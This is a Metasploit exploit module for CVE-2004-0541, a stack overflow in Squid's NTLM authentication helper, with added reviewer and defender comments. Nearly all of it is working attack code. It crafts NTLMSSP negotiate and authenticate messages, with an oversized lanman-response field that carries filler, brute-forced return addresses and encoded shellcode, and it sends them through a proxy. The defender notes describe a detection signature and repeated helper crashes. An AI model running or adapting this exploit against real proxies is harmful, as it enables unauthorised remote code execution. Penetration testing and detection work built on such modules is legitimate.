Path: blob/master/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit exploit module for CVE-2004-0541, a stack buffer overflow in
# Squid's NTLM authentication helper (libntlmssp.c, ntlm_check_auth).
#
# What this file shows: an NTLMSSP_NEGOTIATE message is sent first, then an
# NTLMSSP_AUTHENTICATE message whose "lanman response" length fields carry the
# size of the whole filler+payload blob appended after the 56-byte header (see
# transmit_authenticate). The return address is not known in advance, so the
# Brute mixin walks the 'Ret'/'Valid' range declared under 'Targets' and calls
# brute_exploit once per candidate.
#
# Defender notes grounded in this file:
#   * the Type 3 message advertises a lanman-response length equal to the
#     filler+payload size rather than the fixed size of a real LM response,
#     and travels base64-encoded in a "Proxy-Authorization: NTLM" header of an
#     otherwise ordinary proxied GET — a usable detection signature on
#     proxy traffic;
#   * every wrong address guess crashes the helper; the BruteWait comment
#     below notes that Squid exits after 5 helper crashes, so a brute-force
#     run leaves repeated helper crashes on the target (presumably visible in
#     Squid's own logs — verify).
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Brute
  include Msf::Exploit::Remote::Tcp

  # Registers module metadata (name, references, payload constraints, the
  # brute-force address range) and the BruteWait advanced option.
  #
  # @param info [Hash] metadata merged via update_info (Metasploit convention)
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Squid NTLM Authenticate Overflow',
      'Description' => %q{
        This is an exploit for Squid\'s NTLM authenticate overflow
        (libntlmssp.c). Due to improper bounds checking in
        ntlm_check_auth, it is possible to overflow the 'pass'
        variable on the stack with user controlled data of a user
        defined length. Props to iDEFENSE for the advisory.
      },
      'Author' => 'skape',
      'References' =>
        [
          [ 'CVE', '2004-0541'],
          [ 'OSVDB', '6791'],
          [ 'URL', 'http://www.idefense.com/application/poi/display?id=107'],
          [ 'BID', '10500'],
        ],
      'Privileged' => false,
      'Payload' =>
        {
          # At most 256 bytes of encoded payload with at least 16 NOPs; the
          # two raw byte strings are prepended to the payload / ahead of the
          # encoder output (their exact semantics live in the framework,
          # not in this file).
          'Space' => 256,
          'MinNops' => 16,
          'Prepend' => "\x31\xc9\xf7\xe1\x8d\x58\x0e\xb0\x30\x41\xcd\x80",
          'PrependEncoder' => "\x83\xec\x7f",

        },
      'Platform' => %w{ linux },
      'Targets' =>
        [
          [ 'Linux Bruteforce',
            {
              'Platform' => 'linux',
              # Address range walked by Msf::Exploit::Brute; each step hands
              # a { 'Ret' => ..., 'Valid' => ... } hash to brute_exploit.
              # NOTE(review): 'Step' => 0 leaves the stride to the Brute
              # mixin (not visible in this file) — confirm before changing.
              'Bruteforce' =>
                {
                  'Start' => { 'Ret' => 0xbfffcfbc, 'Valid' => 0xbfffcf9c },
                  'Stop' => { 'Ret' => 0xbffffffc, 'Valid' => 0xbffffffc },
                  'Step' => 0
                }
            },
          ],
        ],
      'DisclosureDate' => '2004-06-08',
      'DefaultTarget' => 0))

    register_advanced_options(
      [
        # We must wait 15 seconds between each attempt so as to prevent
        # squid from exiting completely after 5 crashes.
        OptInt.new('BruteWait', [ false, "Delay between brute force attempts", 15 ]),
      ])
  end

  # One brute-force attempt: opens a connection, sends the NEGOTIATE and
  # AUTHENTICATE messages built around the current address guess, then hands
  # off to the payload handler. Presumably invoked by the Brute mixin once
  # per candidate in the 'Bruteforce' range (the caller is not in this file).
  #
  # @param addresses [Hash] 'Ret' and 'Valid' for this step of the range
  # @return [void]
  def brute_exploit(addresses)
    # Random host label so each request differs. rand(128) may return 0,
    # which would yield an empty label ("http://.com"); presumably incidental
    # since the URL plays no part in the overflow — confirm.
    site = "http://" + rand_text_alpha(rand(128)) + ".com"

    print_status("Trying 0x#{"%.8x" % addresses['Ret']}...")
    connect

    # The name carries a typo (trasnmit) but matches the definition below;
    # renaming would have to change both call and definition together.
    trasnmit_negotiate(site)
    transmit_authenticate(site, addresses)

    # handler / disconnect come from the included mixins (not shown here).
    handler
    disconnect
  end

  # Sends the NTLMSSP_NEGOTIATE (Type 1) message. Every field is a constant;
  # the len/max/offset fields are set to 1 as the inline comments record. The
  # message is base64-encoded into a "Proxy-Authorization: NTLM" header.
  #
  # @param site [String] URL placed in the request line
  # @return [void]
  def trasnmit_negotiate(site)
    negotiate =
      "NTLMSSP\x00" + # NTLMSSP identifier
      "\x01\x00\x00\x00" + # NTLMSSP_NEGOTIATE
      "\x07\x00\xb2\x07" + # flags
      "\x01\x00\x09\x00" + # workgroup len/max (1)
      "\x01\x00\x00\x00" + # workgroup offset (1)
      "\x01\x00\x03\x00" + # workstation len/max (1)
      "\x01\x00\x00\x00" # workstation offset (1)

    print_status("Sending NTLMSSP_NEGOTIATE (#{negotiate.length} bytes)")
    req =
      "GET #{site} HTTP/1.1\r\n" +
      "Proxy-Connection: Keep-Alive\r\n" +
      "Proxy-Authorization: NTLM #{Rex::Text.encode_base64(negotiate)}\r\n" +
      "\r\n"
    sock.put(req)

  end

  # Sends the NTLMSSP_AUTHENTICATE (Type 3) message that triggers the
  # overflow described in the module metadata.
  #
  # Layout: the fixed header below is exactly 56 (0x38) bytes
  # (8 + 4 + 4 + 4 + 4 + 4 + 4 + 4 + 4 + 4 + 4 + 4 + 4), which is why the
  # lanman response offset field is 0x38 — it points at `overflow`, which
  # directly follows the header. The lanman response len/max fields carry the
  # full size of overflow + shellcode; this is the "user defined length" from
  # the description. A genuine LM response is a fixed 24 bytes, so this field
  # is the natural place for a proxy-side detection rule to look.
  #
  # @param site [String] URL placed in the request line
  # @param addresses [Hash] 'Ret' and 'Valid' from the brute-force range
  # @return [void]
  def transmit_authenticate(site, addresses)
    # 32 bytes of filler, the two candidate addresses as 32-bit little-endian
    # words (pack 'V'), then a fixed trailing word: 44 bytes in total.
    overflow =
      rand_text_alphanumeric(0x20) +
      [addresses['Ret']].pack('V') +
      [addresses['Valid']].pack('V') +
      "\xff\x00\x00\x00"
    shellcode = payload.encoded
    # 16-bit little-endian length (pack 'v'); overflow is 44 bytes and the
    # payload is bounded by 'Space' => 256 above, so it stays far below 65535.
    pass_len = [overflow.length + shellcode.length].pack('v')
    authenticate =
      "NTLMSSP\x00" + # NTLMSSP identifier
      "\x03\x00\x00\x00" + # NTLMSSP_AUTHENTICATE
      pass_len + pass_len + # lanman response len/max
      "\x38\x00\x00\x00" + # lanman response offset (56)
      "\x01\x00\x01\x00" + # nt response len/max (1)
      "\x01\x00\x00\x00" + # nt response offset (1)
      "\x01\x00\x01\x00" + # domain name len/max (1)
      "\x01\x00\x00\x00" + # domain name offset (1)
      "\x01\x00\x01\x00" + # user name (1)
      "\x01\x00\x00\x00" + # user name offset (1)
      "\x00\x00\x00\x00" + # session key
      "\x8b\x00\x00\x00" + # session key
      "\x06\x82\x00\x02" + # flags
      overflow + shellcode

    print_status("Sending NTLMSSP_AUTHENTICATE (#{authenticate.length} bytes)")
    req =
      "GET #{site} HTTP/1.1\r\n" +
      "Proxy-Connection: Keep-Alive\r\n" +
      "Proxy-Authorization: NTLM #{Rex::Text.encode_base64(authenticate)}\r\n" +
      "\r\n"
    sock.put(req)
  end
end